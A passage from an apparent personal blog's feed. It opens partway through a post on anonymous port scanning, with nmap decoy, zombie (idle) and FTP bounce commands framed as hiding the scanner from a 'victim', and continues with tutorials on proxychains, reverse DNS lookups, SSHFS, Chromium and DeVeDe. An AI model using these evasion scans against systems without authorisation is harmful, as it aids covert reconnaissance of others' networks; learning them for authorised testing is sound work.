true origin of the scan before you launch your assault. Neat, huh?
Here's all you need to do:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
sudo nmap -sS -P0 -D decoy_host1,decoy_host2,decoy_host3 target_host
&lt;/pre&gt;
&lt;p&gt;A brief explanation: the &amp;quot;-sS&amp;quot; flag specifies that nmap should use a SYN
scan, and the -D flag allows us to input an arbitrary amount of decoy
hosts to add to our scan. The -P0 flag, as before, disables ICMP pings,
so once again you might be scanning a host that is down. The more decoys
you add, the more hidden you will stay, but the slower your scan will
go. If you are on a local network, also note that this will not change
your &lt;a class="reference external" href="http://en.wikipedia.org/wiki/MAC_address"&gt;MAC&lt;/a&gt; address, and this could definitely be logged (and is a dead
giveaway that something bad is going on.) In addition, don't use the -A
flag (or similar), as the version detection techniques used by nmap
could expose your IP address (more
&lt;a class="reference external" href="http://nmap.org/book/vscan-technique.html"&gt;here&lt;/a&gt; if you're curious).
Despite these limitations, this scan is definitely quite effective at
hiding your identity, and, because of how easy it is to use, is probably
the first one that you want to turn to for general scanning.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="zombie-idle-scanning"&gt;
&lt;h2&gt;Zombie (Idle) Scanning&lt;/h2&gt;
&lt;p&gt;Probably the coolest (and most complex) of these techniques is the idle
scan (more awesomely known as the zombie scan). The concept behind
zombie scanning is essentially to, in the great tradition of hacking,
turn the logic of TCP protocol against itself. Rather than lengthen this
already lengthy post with a description of how this scan works, I will
refer the interested person to nmap's &lt;a class="reference external" href="http://nmap.org/book/idlescan.html"&gt;very thorough documentation of
the scan&lt;/a&gt;. In very short, though, this technique can completely hide
your IP address, given you can find a zombie host that is receiving very
little traffic and has predictable IP IDs. Now, these can be pretty
tough requirements, as most modern OSes have switched to rather
unpredictable IDs, but if you can find an older host (think printers,
legacy systems) that has these features this is probably the best attack
out of the lot as anonymity goes. The easiest way to go about doing this
is to either a.) just scan the network with nmap and look for hosts that
look unkempt, or b.) (my preferred method) just use your &lt;a class="reference external" href="https://spareclockcycles.org/2010/04/25/updated-reverse-dns-tool/"&gt;reverse DNS
mapping of the network&lt;/a&gt; to find a printer, which in all likelihood will
be suitable as a zombie. To check if your chosen host is vulnerable, you
can use the useful tool hping3:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
sudo hping3 -Q target_host -p port -S
&lt;/pre&gt;
&lt;p&gt;This sends SYN packets to the host and prints out the difference in IP
IDs between the current and previous SYN+ACKs received. This is sample
output from a host that could be used for a zombie scan:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
HPING [target] (eth0 [target]):
 100949560 +100949560
 100949570 +10
 100949580 +10
 100949590 +10
&lt;/pre&gt;
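&lt;p&gt;The judgment that output asks you to make (is the increment small and constant?) is easy to automate if you're sifting through a lot of candidate zombies. A minimal sketch, with a hypothetical function name and an arbitrary threshold:&lt;/p&gt;

```python
def looks_like_good_zombie(ip_ids, max_step=16):
    """Heuristic check on the raw IP ID values observed from a
    candidate zombie (e.g. parsed from hping3 output): a usable
    zombie shows a constant, small, positive increment between
    consecutive replies, i.e. an idle host with a sequential global
    IP ID counter. The max_step threshold is an illustrative guess."""
    if len(ip_ids) >= 3:
        deltas = [b - a for a, b in zip(ip_ids, ip_ids[1:])]
        first = deltas[0]
        # constant, small, positive increment across all samples
        return first in range(1, max_step + 1) and all(d == first for d in deltas)
    return False  # not enough samples to judge
```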
&lt;p&gt;If you can find a host like this, it truly and completely hides your IP
address from the victim host. Here's all you need to do with nmap:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
sudo nmap -P0 -sI zombie_host target_host
&lt;/pre&gt;
&lt;p&gt;That's all there is to it! Given you found a suitable host, nmap will
now scan the target host, and it will look as though the zombie host is
the malicious host. Sneaky, huh? Note: if the zombie host receives ANY
extra traffic from other hosts during your scan, you could get invalid
results. Keep in mind that this method's results might not be wholly
accurate, and that scanning this way can be quite slow.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="ftp-bounce-scanning"&gt;
&lt;h2&gt;FTP Bounce Scanning&lt;/h2&gt;
&lt;p&gt;The final technique I will be presenting here is &lt;a class="reference external" href="http://nmap.org/nmap_doc.html#bounce"&gt;FTP bounce scanning&lt;/a&gt;,
a slightly more obscure but definitely useful method of port scanning.
When the FTP protocol was first defined in &lt;a class="reference external" href="http://www.faqs.org/rfcs/rfc959.html"&gt;RFC 959&lt;/a&gt;, it contained an
interesting specification: that the PORT command could be used to
attempt to connect to a port on another machine. While useful,
certainly, for connecting to other FTP servers easily, its writers
(fortunately or unfortunately) didn't realize that this could and would
be abused. The specifications were changed, but many older FTP servers
still have this vulnerability (especially many network printers, oddly
enough). If you can find a host that has an FTP server with this problem
(which, nicely enough, nmap can scan for with the -A flag), you can use
this scan to force the FTP server to act as an unwilling proxy for your
scan, completely hiding your IP address. It can also, nicely, be used to
scan inside a network in the case that the FTP server is exposed but the
rest of the network isn't. In addition, you could also possibly use it
to launch further attacks against the host, as FTP bounce servers can be
used to proxy arbitrary data onto a TCP connection. So what's the
downside? It is SLOW. Very, very slow. I'm working on a script that can
divide the scanning amongst multiple FTP bounce servers, which could
speed things up a bit, but it still has some bugs to work out (I'll
update here with a post when I get time to finish it). Really though,
it's best to keep this one for when anonymity is a must and speed is not
a concern. For those situations, though, it works perfectly. Here's how
to do it:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
nmap -P0 -b ftp_bounce_host target_host
&lt;/pre&gt;
&lt;p&gt;Wait awhile, and you will hopefully have a list of open ports, and your
victim will be wondering why a network printer just tried connecting to
some ports on their system. Win!&lt;/p&gt;
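&lt;p&gt;For the curious, the whole bounce trick hinges on the PORT argument format from RFC 959: the four address bytes, then the port split into its high and low bytes, all comma-separated. A quick sketch of that encoding (a hypothetical helper for illustration, not how nmap itself is implemented):&lt;/p&gt;

```python
def port_command_arg(host, port):
    """Encode host:port as the PORT argument defined in RFC 959.
    A bounce scan issues PORT with the *victim's* address and port,
    then a transfer command, and infers the port's state from
    whether the FTP server manages to open the data connection."""
    if port not in range(65536):
        raise ValueError("port out of range")
    h1, h2, h3, h4 = host.split(".")
    return ",".join([h1, h2, h3, h4, str(port >> 8), str(port & 0xFF)])
```

&lt;p&gt;So port_command_arg(&amp;quot;10.0.0.5&amp;quot;, 80) yields 10,0,0,5,0,80, which a bounce scanner would send to the vulnerable server as &amp;quot;PORT 10,0,0,5,0,80&amp;quot; before each probe.&lt;/p&gt;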
&lt;/div&gt;
&lt;div class="section" id="conclusion"&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;&amp;quot;When you do things right, people won't be sure you've done anything at
all.&amp;quot; --Futurama&lt;/p&gt;
&lt;p&gt;Although each technique here is great at hiding your identity while port
scanning, that doesn't give you a license to be stupid and scan anything
and everything. Be selective (and be legal). While it's great to know
that J. Random Sysadmin isn't going to be able to track you down if he
notices something, it'd be best if he never noticed anything at all.
After all, it may put people on their guard, which could make your job
much, much harder. Choose carefully which hosts and ports you want to
focus on (see my &lt;a class="reference external" href="https://spareclockcycles.org/2010/04/25/updated-reverse-dns-tool/"&gt;reverse DNS scanning tool&lt;/a&gt;), only enable features
in nmap that require extra connections when you have to (&lt;a class="reference external" href="http://nmap.org/book/man.html"&gt;nmap
documentation&lt;/a&gt;), and, for the love of zombie jesus, don't use -p1-65535
unless you ABSOLUTELY have to. Stick to those rules, and things should
go quite well.&lt;/p&gt;
&lt;p&gt;In my next post, I will be exploring the IDS/IPS evasion techniques
built into nmap, which can allow you to scan through otherwise restrictive
firewalls. Until then, have fun scanning!&lt;/p&gt;
&lt;div class="zemanta-pixie" style="margin-top: 10px; height: 15px;"&gt;&lt;p&gt;&lt;a class="reference external" href="http://reblog.zemanta.com/zemified/a8b92b87-4395-46e3-8039-bef5cb9fbb89/"&gt;&lt;img alt="Reblog this post [with Zemanta]" src="http://img.zemanta.com/reblog_e.png?x-id=a8b92b87-4395-46e3-8039-bef5cb9fbb89" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
</summary><category term="anonymity"></category><category term="hacking"></category><category term="hping3"></category><category term="nmap"></category><category term="Pen Testing"></category><category term="port scanning"></category><category term="proxychains"></category><category term="socks"></category><category term="TCP"></category></entry><entry><title>Socksify Anything</title><link href="https://spareclockcycles.org/2010/04/15/socksify-anything.html" rel="alternate"></link><updated>2010-04-15T21:09:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-04-15:2010/04/15/socksify-anything.html</id><summary type="html">&lt;p&gt;As a follow-up to one of my posts awhile back, I figured I'd share a
small tip with those who don't use SOCKS proxies quite as often as I do.
In my &lt;a class="reference external" href="https://spareclockcycles.org/2009/04/10/ssh-secure-browsing-via-socks-proxy/"&gt;previous post&lt;/a&gt;, I showed how to set up an &lt;a class="reference external" href="http://en.wikipedia.org/wiki/SOCKS"&gt;SOCKS proxy&lt;/a&gt; that
tunnelled your (now encrypted) traffic through a remote SSH server, as
well as how to configure &lt;a class="reference external" href="http://www.mozilla.com/firefox/"&gt;Firefox&lt;/a&gt; to use that tunnel. But what if your
application doesn't support SOCKS proxies? And what if you want to
tunnel through multiple hosts (I'm sure you could think of a situation
:P)?&lt;/p&gt;
&lt;p&gt;Well, you're in luck: &lt;a class="reference external" href="http://proxychains.sourceforge.net/"&gt;proxychains&lt;/a&gt; can handle all of that. When used
to execute an application, proxychains acts as a middleware layer,
intercepting all TCP connections, wrapping them in the SOCKS protocol,
and routing them through the proxies of your choice. If you're on
Ubuntu, it's, as usual, brilliantly easy to install. One &amp;quot;sudo apt-get
install proxychains&amp;quot; and you're good to go. Now how do we go about using
it?&lt;/p&gt;
&lt;p&gt;The first thing you need to do to use proxychains is to set up a
configuration file. On Ubuntu (and, I'm assuming, any other install),
there is a default file in /etc/proxychains.conf that you can look at
for guidance, but I have &lt;a class="reference external" href="http://www.personal.utulsa.edu/~ben-schmidt/proxychains.conf"&gt;included mine for reference&lt;/a&gt; just in case.
Now, there are three places proxychains will look for a config file when
it is executed: in the local directory, at
~/.proxychains/proxychains.conf , and in /etc/proxychains.conf (and they
are prioritized in that order). Choose yours according to what works best
for you. I'd assume that either your home folder or etc folder would be
the best, as it will work without a fuss no matter what your $PWD is.
Now, the proxychains config has a good number of options, so you'll need
to know what's best for you. For most, the dynamic chain is best: it
functions as long as one of the proxies in its configuration list is
online. I'd also recommend enabling proxy_dns if it's not on, to
prevent DNS leakage. The rest of the default options should be fine.
After that, all you need to do is add your proxy in the form of
&amp;quot;proxy_type host port&amp;quot;, which, if you're using an SSH proxy like in my
previous post, will be something like &amp;quot;socks4 127.0.0.1 6789&amp;quot;.&lt;/p&gt;
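&lt;p&gt;Putting those pieces together, a minimal config along those lines might look like the following sketch (the proxy hosts and ports are placeholders, so adjust them to your own setup):&lt;/p&gt;

```
# ~/.proxychains/proxychains.conf
dynamic_chain
# resolve hostnames through the chain to prevent DNS leakage
proxy_dns

[ProxyList]
# proxy_type host port
socks4 127.0.0.1 6789
```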
&lt;p&gt;Now save the file, and you're ready to go. If you, say, want to update
your system, all you need to do is &amp;quot;sudo proxychains apt-get update&amp;quot;,
and away it goes. If you want to chain your traffic through multiple
hosts, simply add more to your config file, and run &amp;quot;proxychains
./myapp&amp;quot;. Enjoy!&lt;/p&gt;
&lt;p&gt;Update 04/16/2010: As mentioned in a previous post, &lt;a class="reference external" href="http://tsocks.sourceforge.net/"&gt;tsocks&lt;/a&gt; is also a
good application for socksifying connections, and worth trying if
proxychains doesn't work for you. However, you can't (as far as I know)
use it to chain multiple proxies together, so keep that in mind.&lt;/p&gt;
&lt;div class="zemanta-pixie" style="margin-top:10px;height:15px;"&gt;&lt;p&gt;&lt;a class="reference external" href="http://reblog.zemanta.com/zemified/5d749b47-b18e-4dd0-aa88-99004e51e6d9/"&gt;&lt;img alt="Reblog this post [with Zemanta]" src="http://img.zemanta.com/reblog_e.png?x-id=5d749b47-b18e-4dd0-aa88-99004e51e6d9" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;</summary><category term="Add new tag"></category><category term="apt-get"></category><category term="proxy"></category><category term="sockisfy"></category><category term="socks"></category><category term="ssh"></category><category term="Ubuntu"></category></entry><entry><title>Reverse DNS Lookups with dnspython</title><link href="https://spareclockcycles.org/2010/04/13/reverse-dns-lookups-with-dnspython.html" rel="alternate"></link><updated>2010-04-13T13:43:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-04-13:2010/04/13/reverse-dns-lookups-with-dnspython.html</id><summary type="html">&lt;p&gt;Hey all,&lt;/p&gt;
&lt;p&gt;Sorry once again for the long lull in posting. School has not been kind
towards my desire to blog. I will hopefully be posting more frequently
in the coming weeks and months.&lt;/p&gt;
&lt;p&gt;Anyways, now that the apologies are out of the way, here's a little
something I was messing around with this morning during class. It's
often useful to be able to do &lt;a class="reference external" href="http://en.wikipedia.org/wiki/Reverse_DNS_lookup"&gt;reverse DNS&lt;/a&gt; lookups of a given IP range
to find hosts with interesting domain names, whether they're interesting
because it looks like a network administrator has forgotten about them,
or because they look like they weren't meant to be found (you'd be
surprised how many machines rely on this sort of &lt;a class="reference external" href="http://en.wikipedia.org/wiki/Security_through_obscurity"&gt;security through
obscurity&lt;/a&gt;), or just because they have something like &amp;quot;mail&amp;quot; or &amp;quot;proxy&amp;quot;
in their name. A simple way to do this is to write up a short bash
script that uses the host or dig commands. However, this is slow
(because you have to spawn a ton of processes), and I don't get to use
Python.&lt;/p&gt;
&lt;p&gt;Enter dnspython. dnspython is a great tool for working with DNS, so I'd
suggest you &lt;a class="reference external" href="http://www.dnspython.org/"&gt;look through their site&lt;/a&gt; if you're interested in messing
around with DNS at all. Doing a reverse lookup of an IP address is quite
easy:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
from dns import resolver,reversename
addr=reversename.from_address(&amp;quot;192.168.0.1&amp;quot;)
str(resolver.query(addr,&amp;quot;PTR&amp;quot;)[0])
&lt;/pre&gt;
&lt;p&gt;This will probably throw a NXDOMAIN error, being a local address and
all, but you get the idea. Taking this, it's obviously very easy to make
a fast, effective script for scanning large ranges of IP addresses to
find potentially interesting hosts.&lt;/p&gt;
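&lt;p&gt;As a rough illustration of that idea, here's a sketch using only the standard library (socket standing in for dnspython, with the resolver injectable for testing, and a purely illustrative keyword list):&lt;/p&gt;

```python
import ipaddress
import socket

def interesting_hosts(cidr, keywords=("mail", "proxy", "printer"), resolve=None):
    """Walk a CIDR range, reverse-resolve each address, and keep the
    names containing any of the given keywords. Failed lookups are
    simply skipped, since most addresses in a range won't have a PTR
    record at all."""
    resolve = resolve or (lambda a: socket.gethostbyaddr(a)[0])
    found = {}
    for ip in ipaddress.ip_network(cidr).hosts():
        addr = str(ip)
        try:
            name = resolve(addr)
        except (socket.herror, socket.gaierror, OSError):
            continue  # NXDOMAIN, timeout, etc.
        if any(k in name.lower() for k in keywords):
            found[addr] = name
    return found
```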
&lt;p&gt;I took a bit and wrote up a short python script using this technique
(and a small reverse DNS module that you can use in other programs). I
have attached it in case anyone would find that useful. Usage
instructions are included: &lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/revdns.tar.gz"&gt;revdns.tar.gz&lt;/a&gt;. Be sure that you have
dnspython installed, or else this will probably not work :P .&lt;/p&gt;
&lt;p&gt;Hopefully I'll be back soon enough with some more interesting and in
depth things I've been working on.&lt;/p&gt;
&lt;p&gt;UPDATE 04/24/10: So yeah, I just realized that I mistakenly referenced
&amp;quot;PyDNS&amp;quot; as the name of the module I used, when in fact it was the
incredibly useful &lt;a class="reference external" href="http://www.dnspython.org/"&gt;dnspython&lt;/a&gt; module. My bad. That's what I get for not
checking my posts thoroughly. I updated all the references to it
accordingly, but I figured for the sake of honesty I would clarify here
as well. I also updated the source to deal with lookup timeouts a little
better, if you care. Happy hacking!&lt;/p&gt;
&lt;div class="zemanta-pixie" style="margin-top: 10px; height: 15px;"&gt;&lt;p&gt;&lt;a class="reference external" href="http://reblog.zemanta.com/zemified/41e60162-fef3-4f5f-b102-b69ca176f552/"&gt;&lt;img alt="Reblog this post [with Zemanta]" src="http://img.zemanta.com/reblog_e.png?x-id=41e60162-fef3-4f5f-b102-b69ca176f552" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;</summary><category term="dns"></category><category term="dnspython"></category><category term="hacking"></category><category term="Pen Testing"></category><category term="python"></category><category term="reverse dns"></category></entry><entry><title>SSHFS: Securely Access a Remote Filesystem</title><link href="https://spareclockcycles.org/2009/05/18/sshfs-securely-access-a-remote-filesystem.html" rel="alternate"></link><updated>2009-05-18T15:47:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2009-05-18:2009/05/18/sshfs-securely-access-a-remote-filesystem.html</id><summary type="html">&lt;p&gt;Once again, I find myself singing the praises of &lt;a class="reference external" href="http://en.wikipedia.org/wiki/Secure_Shell"&gt;SSH&lt;/a&gt;. Seriously, is
there much of a reason to have any other ports open anymore? The latest
trick I have added to my list of things SSH can do is presenting a
remote &lt;a class="reference external" href="http://en.wikipedia.org/wiki/File_system"&gt;filesystem&lt;/a&gt;, securely. Now, I'm sure most of us are aware that
you can transfer files over SSH using a &lt;a class="reference external" href="http://en.wikipedia.org/wiki/Protocol_%28computing%29"&gt;protocol&lt;/a&gt; called &lt;a class="reference external" href="http://en.wikipedia.org/wiki/SSH_file_transfer_protocol"&gt;SFTP&lt;/a&gt;. What
you may or may not be aware of is that you can mount this remote filesystem
locally using a nifty little tool called &lt;a class="reference external" href="http://en.wikipedia.org/wiki/SSHFS"&gt;SSHFS&lt;/a&gt;. This is incredibly
useful in a number of situations, allowing you to access remote files in
a way that is easy for the user (as easy as local filesystems), easier
to set up than solutions such as &lt;a class="reference external" href="http://en.wikipedia.org/wiki/Network_File_System_%28protocol%29"&gt;NFS&lt;/a&gt;, and as secure as SSH itself.&lt;/p&gt;
&lt;p&gt;All you have to do on the remote machine you wish to access is have
&lt;a class="reference external" href="http://www.openssh.com"&gt;OpenSSH&lt;/a&gt; listening somewhere. For the client machine, you need to make
sure you have SSHFS installed. To do this on Ubuntu, simply run:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
sudo apt-get install sshfs
&lt;/pre&gt;
&lt;p&gt;Now, to mount the filesystem locally, we first need to create a &lt;a class="reference external" href="http://en.wikipedia.org/wiki/Mount_%28computing%29"&gt;mount
point&lt;/a&gt; for the filesystem:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
mkdir /path/to/mountpoint
chown user /path/to/mountpoint
&lt;/pre&gt;
&lt;p&gt;Where user is your username and /path/to/mountpoint is where you want
the remote filesystem to appear.
Now, to go ahead and mount the remote filesystem, simply execute this
command with your own information inserted:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
sshfs remote-username&amp;#64;address.of.server:/remote/folder/to/mount /path/to/mountpoint
&lt;/pre&gt;
&lt;p&gt;Enter your password, and that's it! Your remote filesystem should now be
mounted.&lt;/p&gt;
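&lt;p&gt;If your server listens on a nonstandard port, or you want the mount to
survive flaky connections, sshfs takes extra options on the command line.
A sketch (the port number is just an example; reconnect and idmap=user are
standard sshfs options):&lt;/p&gt;
&lt;pre class="literal-block"&gt;
sshfs -p 2222 -o reconnect,idmap=user remote-username&amp;#64;address.of.server:/remote/folder/to/mount /path/to/mountpoint
&lt;/pre&gt;
&lt;p&gt;The idmap=user option maps the remote user's uid to your local one, which
saves you some permission headaches on the mounted files.&lt;/p&gt;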
&lt;p&gt;Well that's pretty cool in itself, but what if we want to go farther and
have it mount at startup without any interaction from us? No problem,
thanks to another cool feature of SSH called public key authentication.
This feature allows us to log in to a system without providing the
password of the user we are authenticating as, authenticating instead
with an RSA key pair. If you trust me that this
is secure, you can skip the next paragraph, but if you don't, or you are
curious how this works, read on.&lt;/p&gt;
&lt;p&gt;SSH actually uses two kinds of cryptography. The bulk of your traffic is
encrypted with a symmetric cipher (AES, 3DES, whatever you want), because
asymmetric algorithms like &lt;a class="reference external" href="http://en.wikipedia.org/wiki/RSA"&gt;RSA&lt;/a&gt; are far too slow to handle that much
data; the asymmetric algorithms are instead used to set up the connection
securely and to prove identities. The way public key cryptography works is
that each participant has a pair of keys: a public key, which you can hand
out to anyone, and a private key, which never leaves the local machine.
Data encrypted with the public key can only be decrypted with the matching
private key, and, conversely, a signature produced with the private key can
be verified by anyone holding the public key. That second property is what
public key authentication relies on: when you log in, your SSH client
proves that it holds the private key by signing a challenge, and the server
checks the signature against the public key you installed on it earlier. No
password ever crosses the wire, and as long as the private key is kept
secret, no one else can produce a valid signature and impersonate you. If
you would like more explanation than the incredibly brief overview I just
gave, go check out the Wikipedia articles on RSA and on SSH; they should
give you all the information you want.&lt;/p&gt;
&lt;p&gt;Now that you don't feel like you're doing something incredibly dangerous
(or maybe you still do, and you just like danger...:P ), follow &lt;a class="reference external" href="http://sial.org/howto/openssh/publickey-auth/"&gt;these
steps on how to set up public key authentication
between two hosts&lt;/a&gt;. Once done, all that's left to do is add the sshfs
command that we used earlier to mount the remote filesystem to a startup
script somewhere. To do this in Ubuntu/GNOME, you can simply go to
System-&amp;gt;Preferences-&amp;gt;Startup Applications and add a new entry that uses
our command from earlier as the command to be executed at login. If you
are not on Ubuntu or using GNOME, you should be able to find
documentation somewhere on how to make something run on startup.&lt;/p&gt;
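&lt;p&gt;If you'd rather not depend on your desktop environment at all, you can
instead put the mount in /etc/fstab. Something like the following should
work with the classic sshfs# notation (I haven't tested this on every
sshfs version, so adjust to taste):&lt;/p&gt;
&lt;pre class="literal-block"&gt;
sshfs#remote-username&amp;#64;address.of.server:/remote/folder/to/mount /path/to/mountpoint fuse noauto,user,idmap=user 0 0
&lt;/pre&gt;
&lt;p&gt;With noauto and user set, any regular user can then bring the share up
on demand with mount /path/to/mountpoint.&lt;/p&gt;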
&lt;p&gt;That's all there is to it; I hope someone finds it useful. Just a short
note: if you need to unmount the share, simply execute sudo umount
/path/to/mountpoint (or fusermount -u /path/to/mountpoint as a regular
user) and you'll be fine. Enjoy!&lt;/p&gt;
&lt;div class="zemanta-pixie" style="margin-top:10px;height:15px;"&gt;&lt;p&gt;&lt;a class="reference external" href="http://reblog.zemanta.com/zemified/63572218-1f82-4fcb-af73-26531fe02276/"&gt;&lt;img alt="Reblog this post [with Zemanta]" src="http://img.zemanta.com/reblog_e.png?x-id=63572218-1f82-4fcb-af73-26531fe02276" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;</summary><category term="Authentication"></category><category term="Encryption"></category><category term="filesystems"></category><category term="linux"></category><category term="Public-key cryptography"></category><category term="RSA"></category><category term="Secure Shell"></category><category term="Security"></category><category term="ssh"></category><category term="Ubuntu"></category></entry><entry><title>Howto: Install Chromium on Ubuntu</title><link href="https://spareclockcycles.org/2009/05/04/howto-install-chromium-on-ubuntu.html" rel="alternate"></link><updated>2009-05-04T11:34:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2009-05-04:2009/05/04/howto-install-chromium-on-ubuntu.html</id><summary type="html">&lt;p&gt;Hey all, long time no post yet again. Exams can do that to you...but if
you are much more fortunate than I and have some time to kill, I would
highly suggest taking the pre-alpha of Chromium (the open source base of
Google Chrome) for a spin. For a long while now I've been looking for a
decent browser replacement for Firefox on my netbook, which is almost
unbearably slow. Thankfully for my mobile browsing experience, Chromium
seems to be shaping up to be that browser. It still has tons of bugs and
crashes occasionally, but for a pre-alpha it's remarkably polished and
*really* fast. I will be writing a more thorough review once I get the
time, but until then you all can just see for yourself.&lt;/p&gt;
&lt;p&gt;A big fat warning before we begin: EXPECT THINGS TO BREAK. This isn't
even in alpha yet, so there are no guarantees as to your experience.
That said, I've had a pretty good experience with it so far.&lt;/p&gt;
&lt;p&gt;All you really need to do to get Chromium installed is to add the
nightly PPA repository that the developers were kind enough to set up
for all of us Ubuntu users and install the chromium-browser package. To
do this, simply do the following:&lt;/p&gt;
&lt;p&gt;Open up a terminal (or use Alt+F2) and execute the following command:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
sudo gedit /etc/apt/sources.list
&lt;/pre&gt;
&lt;p&gt;Now go to the &lt;a class="reference external" href="https://launchpad.net/~chromium-daily/+archive/ppa"&gt;PPA site&lt;/a&gt; to get the correct lines to add into the
file.&amp;nbsp; To do this, simply select your version of Ubuntu and it will tell
you what lines you need. It should look something like this (the lines
for Intrepid):&lt;/p&gt;
&lt;pre class="literal-block"&gt;
deb http://ppa.launchpad.net/chromium-daily/ppa/ubuntu intrepid main
deb-src http://ppa.launchpad.net/chromium-daily/ppa/ubuntu intrepid main
&lt;/pre&gt;
&lt;p&gt;Add these to the end of the file, save, then exit.&lt;/p&gt;
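&lt;p&gt;Alternatively, if you'd rather keep sources.list untouched, you can drop
the lines into their own file under /etc/apt/sources.list.d/ (the file name
here is just a suggestion):&lt;/p&gt;
&lt;pre class="literal-block"&gt;
sudo sh -c 'echo "deb http://ppa.launchpad.net/chromium-daily/ppa/ubuntu intrepid main" &gt; /etc/apt/sources.list.d/chromium-daily.list'
sudo sh -c 'echo "deb-src http://ppa.launchpad.net/chromium-daily/ppa/ubuntu intrepid main" &gt;&gt; /etc/apt/sources.list.d/chromium-daily.list'
&lt;/pre&gt;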
&lt;p&gt;Now you need to add the repository key. Simply execute this command:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
sudo apt-key adv --recv-keys --keyserver keyserver.ubuntu.com fbef0d696de1c72ba5a835fe5a9bf3bb4e5e17b5
&lt;/pre&gt;
&lt;p&gt;Great! The repository is now installed and verified. Now, simply update
the repositories and install the package by running the following
commands:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
sudo apt-get update
sudo apt-get install chromium-browser
&lt;/pre&gt;
&lt;p&gt;That's it! Chromium should now be installed on your system, ready for
you to play around with. Enjoy.&lt;/p&gt;
</summary><category term="chrome"></category><category term="chromium"></category><category term="Google"></category><category term="linux"></category><category term="Ubuntu"></category></entry><entry><title>Howto: Restoring DVD Backups on Ubuntu with DeVeDe</title><link href="https://spareclockcycles.org/2009/04/14/howto-restoring-dvd-backups-on-ubuntu-with-devede.html" rel="alternate"></link><updated>2009-04-14T14:39:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2009-04-14:2009/04/14/howto-restoring-dvd-backups-on-ubuntu-with-devede.html</id><summary type="html">&lt;p&gt;As a follow-up to my &lt;a class="reference external" href="https://spareclockcycles.org/2008/12/11/handbrake-for-dvd-ripping-on-ubuntu/"&gt;previous post on using Handbrake to rip DVDs&lt;/a&gt;, I
wanted to do a short write-up on how to use a program called &lt;a class="reference external" href="http://www.rastersoft.com/programas/devede.html"&gt;DeVeDe&lt;/a&gt;
to restore those MKV, AVI, and MP4 files that you ripped earlier back to
a DVD that you can use on any DVD player.&lt;/p&gt;
&lt;p&gt;Before finding DeVeDe, I had been looking for a good solution for DVD
creation on Linux for a while. However, nothing had really impressed me
very much. They generally had clunky, bloated UIs and didn't support a
wide range of file formats. DeVeDe changes all that; it uses the same
mencoder backend that Handbrake does, allowing it to support a wide
range of files (pretty much anything mencoder supports). It also sports
a very simple but powerful UI, allowing you to make pretty much any
customization you want to the menu and to build very complex DVD title
structures, all without being overly complex for entry-level
users, and it's pretty enough that it doesn't burn your retinas to look at
it.&lt;/p&gt;
&lt;p&gt;Sound good? Then let's get started. First, you of course need to install
it. To do this on Ubuntu (Hardy/Intrepid/Jaunty, probably others as
well), simply open up a terminal and execute the following command:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
sudo apt-get install devede
&lt;/pre&gt;
&lt;p&gt;That's it! Alternatively, you can install it through Synaptic by
searching for devede and installing the package. But what fun is that?
:P&lt;/p&gt;
&lt;p&gt;Now that DeVeDe is installed, let's open it up and take a look.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://spareclockcycles.files.wordpress.com/2009/04/screenshot-disc-type-selection-devede.png"&gt;&lt;img alt="Select Disc Type - DeVeDe" src="http://spareclockcycles.files.wordpress.com/2009/04/screenshot-disc-type-selection-devede.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;As you can see, you'll first be prompted for what kind of CD/DVD you
want to make. For this tutorial, we will assume you're making a normal
DVD, but there are a lot of other options you can follow if you wish.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://spareclockcycles.files.wordpress.com/2009/04/screenshot-main-screen-devede.png"&gt;&lt;img alt="Main Screen - DeVeDe" src="http://spareclockcycles.files.wordpress.com/2009/04/screenshot-main-screen-devede.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Now we are presented with the home screen, the place where all the magic
happens. You are started out with the most simple DVD possible: a single
DVD title, generically named, and a simple default menu. From here, you
can do pretty much anything you want to do. In the interest of keeping
this simple, we will assume that you just want to burn a backup of a
single movie.&amp;nbsp; First things first: let's name the title. To do this,
simply click on Properties.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://spareclockcycles.files.wordpress.com/2009/04/screenshot-title-properties-devede.png"&gt;&lt;img alt="Title Properties - DeVeDe" src="http://spareclockcycles.files.wordpress.com/2009/04/screenshot-title-properties-devede.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Here, simply enter whatever you want the title to be named, and select
the action you want taken after it's finished (I would suggest just going
to the menu afterwards). After you're done, click OK.&lt;/p&gt;
&lt;p&gt;We now need to add a video file to the title. To do this, simply click
the Add button under the Files box on the right.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://spareclockcycles.files.wordpress.com/2009/04/screenshot-file-properties-devede.png"&gt;&lt;img alt="File Properties - DeVeDe" src="http://spareclockcycles.files.wordpress.com/2009/04/screenshot-file-properties-devede.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Click the file dialog button and select your video file. I would also
suggest changing the format from PAL to NTSC if you live in the
